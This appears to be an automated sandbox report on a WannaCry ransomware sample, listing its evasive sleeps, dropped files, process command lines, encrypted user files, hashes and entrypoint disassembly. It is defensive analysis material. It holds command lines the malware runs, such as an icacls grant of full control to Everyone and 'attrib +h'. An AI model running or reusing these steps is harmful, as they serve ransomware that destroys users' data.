Source: C:\taskdl.exe, Code function: 11_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,11_1_00401080
Contains long sleeps (>= 3 min)
Source: C:\1.exe, Thread delayed: delay time: -1000
Enumerates the file system
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\Adobe\~SD123A.tmp
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\~SD1239.tmp
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD123E.tmp
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\~SD123D.tmp
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\~SD123C.tmp
Source: C:\1.exe, File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\~SD123B.tmp
Found dropped PE file which has not been started or loaded
Source: C:\1.exe, Dropped PE file which has not been started: C:\taskse.exe
Source: C:\1.exe, Dropped PE file which has not been started: C:\@WanaDecryptor@.exe
Source: C:\1.exe, Dropped PE file which has not been started: C:\u.wnry
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\1.exe TID: 3484, Thread sleep time: -500s >= -60s
Source: C:\1.exe TID: 3684, Thread sleep count: 189 > 30
Source: C:\1.exe TID: 3684, Thread sleep time: -189000s >= -60s
Source: C:\1.exe TID: 3696, Thread sleep count: 33 > 30
Source: C:\1.exe TID: 3696, Thread sleep time: -99000s >= -60s
Source: C:\1.exe TID: 3692, Thread sleep time: -100000s >= -60s
Source: C:\1.exe TID: 3712, Thread sleep time: -180000s >= -60s
Source: C:\1.exe TID: 3712, Thread sleep time: -30000s >= -60s
Source: C:\1.exe TID: 3700, Thread sleep time: -30000s >= -60s
Source: C:\1.exe TID: 3716, Thread sleep time: -1000s >= -60s
Source: C:\1.exe TID: 3696, Thread sleep time: -3000s >= -60s
Source: C:\1.exe TID: 3684, Thread sleep time: -1000s >= -60s
Source: C:\1.exe TID: 3692, Thread sleep time: -5000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\1.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe, Process information set: NOOPENFILEERRORBOX
Uses cacls to modify the permissions of files
Source: unknown, Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\1.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cscript.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exe, Queries volume information: C:\@WanaDecryptor@.exe VolumeInformation

Behavior Graph

Behavior Graph ID: 268923, Sample: 1.exe, Startdate: 12/05/2017, Architecture: WINDOWS, Score: 68

  • 1.exe (started)
    • Signature: Drops files with a non-matching file extension (content does not match file extension)
    • Signature: Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)
    • Dropped: taskdl.exe, PE32
    • Dropped: taskse.exe, PE32
    • Dropped: u.wnry, PE32
    • Dropped files exceeded maximum capacity for this level. 2 dropped files have been hidden.
    • Started: attrib.exe
    • Started: icacls.exe
    • Started: cmd.exe
      • Signature: Command shell drops VBS files
      • Signature: Potential malicious VBS script found (suspicious strings)
      • Started: cscript.exe
    • Processes exceeded maximum capacity for this level. 4 processes have been hidden.

Yara Overview

No Yara matches

Startup

  • system is w7_1
  • 1.exe (PID: 3480 cmdline: 'C:\1.exe' MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 3612 cmdline: attrib +h . MD5: 459A5755AFBB1CB3E67CA4C1296599E3)
    • icacls.exe (PID: 3644 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
    • taskdl.exe (PID: 3704 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 3720 cmdline: C:\Windows\system32\cmd.exe /c 67541494599812.bat MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 3756 cmdline: cscript.exe //nologo m.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)
    • taskdl.exe (PID: 3928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4028 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4072 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
  • cleanup

Created / dropped Files

File Path | Type and Hashes | Malicious
C:\00000000.eky
  • Type: data
false
C:\00000000.pky
  • Type: b.out pure object file V2.3 V3.0 Large Text
false
C:\00000000.res
  • Type: FoxPro FPT, blocks size 54356, next free block index 33773925
false
C:\67541494599812.bat
  • Type: DOS batch file, ASCII text, with CRLF, CR line terminators
false
C:\@Please_Read_Me@.txt
  • Type: data
false
C:\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
false
C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_SetupUtility.txt.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY (copy)
  • Type:
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_wcf_CA_smci_20161220_074953_666.txt.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_NDP462-KB3151800-x86-x64-AllOS-ENU_decompression_log.txt.WNCRY (copy)
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Microsoft .NET Framework 4.6.2 Setup_20161220_084829697-MSI_netfx_Full_x86.msi.txt.WNCRY (copy)
C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt
  • Type: data
C:\ProgramData\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
  • Type: data
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt
  • Type: data
C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
  • Type: data
C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt
  • Type: data
C:\ProgramData\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\ProgramData\Microsoft\Windows\Ringtones\@Please_Read_Me@.txt
  • Type: data
C:\ProgramData\Microsoft\Windows\Ringtones\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Music\Sample Music\Kalimba.mp3.WNCRY (copy)
C:\Users\All Users\Documents\My Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY (copy)
C:\Users\All Users\Documents\My Music\Sample Music\Sleep Away.mp3.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Desert.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Jellyfish.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Koala.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Lighthouse.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Penguins.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Pictures\Sample Pictures\Tulips.jpg.WNCRY (copy)
C:\Users\All Users\Documents\My Videos\Sample Videos\Wildlife.wmv.WNCRY (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\0.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\1.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\10.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\11.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\12.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\13.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\2.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\3.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\4.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\5.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\6.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\7.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\8.WNCRYT (copy)
C:\Users\LUKETA~1\AppData\Local\Temp\9.WNCRYT (copy)
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
  • Type: data
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg
  • Type: data
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRYT
  • Type: data
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg
  • Type: data
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRYT
  • Type: data
C:\Users\Public\Music\Sample Music\Kalimba.mp3
  • Type: data
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
  • Type: data
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
  • Type: data
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
  • Type: data
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
  • Type: data
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
  • Type: data
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
false
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
  • Type: data
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
  • Type: data
false
C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
  • Type: data
false
C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
false
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
  • Type: data
false
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\@Please_Read_Me@.txt
  • Type: data
false
C:\Users\luketaylor\AppData\Local\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
false
C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Temp\Microsoft .NET Framework 4.6.2 Setup_20161220_084829697-MSI_netfx_Full_x86.msi.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Temp\dd_NDP462-KB3151800-x86-x64-AllOS-ENU_decompression_log.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Temp\dd_SetupUtility.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Temp\dd_wcf_CA_smci_20161220_074953_666.txt.WNCRYT
  • Type: data
false
C:\b.wnry
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
false
C:\c.wnry
  • Type: data
false
C:\f.wnry
  • Type: ASCII text, with CRLF line terminators
false
C:\m.vbs
  • Type: ASCII text, with CRLF line terminators
false
C:\msg\m_bulgarian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_chinese (simplified).wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_chinese (traditional).wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_croatian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_czech.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_danish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_dutch.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_english.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_filipino.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_finnish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_french.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_german.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_greek.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_indonesian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_italian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_japanese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_korean.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_latvian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_norwegian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_polish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_portuguese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_romanian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_russian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_slovak.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_spanish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_swedish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_turkish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\msg\m_vietnamese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\r.wnry
  • Type: ASCII text, with CRLF line terminators
false
C:\s.wnry
  • Type: Zip archive data, at least v1.0 to extract
false
C:\t.wnry
  • Type: data
false
C:\taskdl.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\taskse.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\u.wnry
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:1.exe
File size:3514368
MD5:84c82835a5d21bbcf75a61706d8ab549
SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512:90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

Static PE Info

General

Entrypoint:0x4077ba
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:68f013d7437aa653a8a98a05807afeb1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040D488h
push 004076F4h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004081C4h]
pop ecx
or dword ptr [0040F94Ch], FFFFFFFFh
or dword ptr [0040F950h], FFFFFFFFh
call dword ptr [004081C0h]
mov ecx, dword ptr [0040F948h]
mov dword ptr [eax], ecx
call dword ptr [004081BCh]
mov ecx, dword ptr [0040F944h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004081B8h]
mov eax, dword ptr [eax]
mov dword ptr [0040F954h], eax
call 00007F3701051D0Bh
cmp dword ptr [0040F870h], ebx
jne 00007F3701051BFEh
push 0040793Ch
call dword ptr [004081B4h]
pop ecx
call 00007F3701051CDDh
push 0040E00Ch
push 0040E008h
call 00007F3701051CC8h
mov eax, dword ptr [0040F940h]
mov dword ptr [ebp-6Ch], eax
